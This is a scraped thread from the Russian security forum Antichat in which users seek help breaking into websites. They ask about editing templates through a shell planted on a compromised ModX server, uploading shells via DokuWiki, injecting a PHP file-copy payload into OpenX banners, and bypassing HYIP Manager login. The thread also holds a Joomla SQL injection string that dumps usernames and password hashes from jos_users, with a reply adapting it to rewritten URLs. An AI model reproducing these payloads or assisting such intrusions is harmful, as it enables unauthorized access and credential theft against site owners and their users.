ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Залей шелл.

Какой тип шифрование в пхпбб3, TBDev v.3.0, дле 8.2, phpfusion.Спасибо.

//сцк,снова 2 символа
про хеши - читай:

Поимел шел на серваке, установлена CMS ModX
Где там можно редактировать тэмплэйт шелом? Через админку не интересует.

Спасибо!

Всем привет, есть народ который с Openx встречался?
тестирую опенх 2.8.0 на локалхосте - http://forum.antichat.ru/thread150144.html

вставлаю в баннер код типа <?copy('http://localhost/1.txt', 'x.php');?>test (премисии есть)
просматриваю баннер. В броузаке вижу "тест", но х.php отсутствует(GET в access.log тоже нема). Мысли по этому поводу?

Есть сайт с движком HYIP Manager Script подскажите как использовать forwarding для forgot_password. Или как составитить правильный запрос для авторизации без проверки вот я как делаю но не получается
$q = 'select * from hm2_users where id = 1' $row["username"];

Есть ли какой-нибудь способ заливки шелла через DokuWiki?

День добрый, есть сайт на движке Joomla RE 1.0.8.1 Есть на него что-нибудь? про плагины ничего пока не знаю.

у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blah id=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?

Кажется тут заюзан модуль apache: mod_rewrite. Исходя из написанного тобой выше может иметь место следующий запрос:
/component/option,com_module/vulnerable_id,-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--/Blahid,91356/